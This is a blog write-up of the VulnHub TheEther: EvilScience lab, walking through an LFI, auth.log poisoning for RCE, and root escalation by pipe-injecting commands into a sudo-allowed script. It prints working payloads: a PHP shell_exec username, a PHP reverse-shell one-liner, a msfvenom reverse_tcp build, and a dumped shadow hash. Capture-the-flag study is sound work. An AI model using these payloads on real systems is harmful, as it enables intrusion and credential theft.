User Rating: 5 / 5

Star ActiveStar ActiveStar ActiveStar ActiveStar Active
 

Hello all!

This week I found new boot2root challenge on https://www.vulnhub.com. The name is TheEther: EvilScience.

Why I decided to write about it? It contains really interesting exploitation way, if you are interested in the way how to pwn it - welcome!

If you want to play with download an image from author's web site - https://securityshards.wordpress.com/2017/10/26/the-ether-a-new-boot-2-root-hacking-challenge/

 

First step - convert to OVF format, how to do with ovftool you can find in my write about Vulnerable VoIP.

 

Lets start with port scanning. We see only 2 ports are opened - tcp/22 and tcp/80.

Nmap scan report for 192.168.56.101
Host is up (0.00048s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 12:09:bc:b1:5c:c9:bd:c3:ca:0f:b1:d5:c3:7d:98:1e (RSA)
|   256 de:77:4d:81:a0:93:da:00:53:3d:4a:30:bd:7e:35:7d (ECDSA)
|_  256 86:6c:7c:4b:04:7e:57:4f:68:16:a9:74:4c:0d:2f:56 (EdDSA)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: The Ether
MAC Address: 08:00:27:4C:B2:0B (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Web site is based on OS Templates. I could not find any vulnerabilities in it.

First thing that looks exploitable was possible LFI:

/index.php?file=about.php

/index.php?file=research.php

I spent a lot of time trying to exploit, but no results. I was close to stop playing with this machine, but decided to try stupid path in the file parameter like /etc/passwd, /etc/issue and other. To do it I created a list of sensitive Linux files and used Burp for it.

After fuzz test was finished, and I was looking at the results one strange response code was found - 302. Request was made to /var/log/auth.log and I check what is within response and..amazing, look at this:

What auth.log contents are doing here?!?!

Ok, now we know 2 usernames: root and evilscience. Bruteforce attack was not successful. But attempts appears in the response, idea was: this username can contains php code and could be executed by server.

Lets try it with username == '<?php phpinfo(); ?>' and results is good, it is RCE!

Lets use shell_exec code in the username: '<?php echo shell_exec($_GET['c']); ?>' .

Here I want to note one thing some php functions like get_file_contents crushed the web site and auth.log will not be parsed or not appears in the server's response. Be careful with it, make a snapshot.

Ok, we used shell_exec in the username and web site works correctly.

Username is hidden..Ok, but I tried to access php shell with burp and command ls. Result was great!

http://192.168.56.102/index.php?file=/var/log/auth.log&c=ls

All files in the web root are enumerated:

about.php
images
index.php
layout
licence.txt
research.php
xxxlogauditorxxx.py

With URL encoding I enumerated, that wget is installed on the server, we can use to upload our more powerful web shell, like weevely.

wget: /usr/bin/wget /usr/share/man/man1/wget.1.gz /usr/share/info/wget.info.gz

Information about how to use weevely you can find here

Wget will not download weevely.php from our web server - rename it =) So, finally I got a shell.

If you do not like weevely shell feel free to catch any type of reverse shells, like in php: php -r '$sock=fsockopen("192.168.56.1",8443);exec("/bin/sh -i <&3 >&3 2>&3");'

sudo -l
sudo: unable to resolve host theEther: Connection refused
Matching Defaults entries for www-data on theEther:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on theEther:
    (ALL) NOPASSWD: /var/www/html/theEther.com/public_html/xxxlogauditorxxx.py
    (root) NOPASSWD: /var/www/html/theEther.com/public_html/xxxlogauditorxxx.py

Ok, so need to analyze this script. This script contains a lof of base64 encoded data and it is pain to decode it and I forget about it and change focus to python eval. It is dangerous, could be used to elevate privileges. Let figure out how sending after log path some commands.

/var/log/auth.log && ls
cat: ls: No such file or directory

/var/log/auth.log & /etc/passwd
and we see auth.log and passwd - cat is used

Why "cat" is dangerous, test it on your machine, symbol | (pipe):

cat /etc/passwd | id
uid=0(root) gid=0(root) groups=0(root)

Passes the output (stdout) of a previous command to the input (stdin) of the next one, or to the shell. This is a method of chaining commands together.
And I you run script with sudo rights - you are root!

Of course first of all I dumped /etc/shadow =)

evilscience:$6$2n.7kzH0$ZOkgsH.GctMP8BZmsbVL1judepxKk7AEWvPoihPXoTQ2o7tEL6qO0Ja.8/5NlnoFs9FimHIE7.q5RasbchsSD.:17464:0:99999:7:::

I did not try to brute it, not needed, we can upload reverse tcp shell and execute it as root, for example with metasploit:

msfvenom -a x86 --platform linux -p linux/x86/shell/reverse_tcp LHOST=192.168.56.1 LPORT=8444 -b "\x00" -f elf -o ./revshell

Upload it to server and catch reverse connection with metasploit:

/var/log/auth.log |./revshell

Here we are!

Last step is to find a flag. It's located in /root folder and is a png image file, lets download it to our machine and review it. I used ftp for doing it.

Image not contains any sensitive EXIF metadata, but with cat I found base24 encoded text and it is the flag.

 

That's all, thank you for reading!

 

 P.S.: about this LFI

<?php
$file = $_GET["file"];

$file = str_ireplace("etc","", $file);
$file = str_ireplace("php:","", $file);
$file = str_ireplace("expect:","", $file);
$file = str_ireplace("data:","", $file);
$file = str_ireplace("proc","", $file);
$file = str_ireplace("home","", $file);
$file = str_ireplace("opt","", $file);

if ($file == "/var/log/auth.log") {
header("location: index.php");
}
else{
include($file);
}

include($file);
?>

Add comment


Security code
Refresh